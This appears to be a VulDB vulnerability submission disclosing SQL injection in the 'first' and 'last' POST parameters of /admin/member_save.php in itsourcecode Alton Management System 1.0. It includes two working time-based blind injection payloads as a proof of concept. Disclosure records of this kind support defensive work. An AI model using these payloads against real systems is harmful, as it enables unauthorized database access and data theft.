| Titel | itsourcecode Alton Management System 1.0 member_save.php |
|---|
| Beschreibung | Log in as an administrator user, access the "/admin/member_save.php" page. This page can pass in the "last" and "first" parameters, both of which can lead to SQL injection vulnerabilities due to lax filtering.
-----------------POC------------------
Parameter: first (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: last=123&first=123' AND (SELECT 9651 FROM (SELECT(SLEEP(5)))LDVG) AND 'Zjoq'='Zjoq&contact=123&address=123
Parameter: last (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: last=123' AND (SELECT 9207 FROM (SELECT(SLEEP(5)))IyrR) AND 'YcaK'='YcaK&first=123&contact=123&address=123
----------------------------------------- |
|---|
| Quelle | ⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE8-4.md |
|---|
| Benutzer | Dee.Mirage (UID 71702) |
|---|
| Einreichung | 27.07.2024 12:31 (vor 2 Jahren) |
|---|
| Moderieren | 30.07.2024 15:29 (3 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 273145 [itsourcecode Alton Management System 1.0 /admin/member_save.php last/first SQL Injection] |
|---|
| Punkte | 20 |
|---|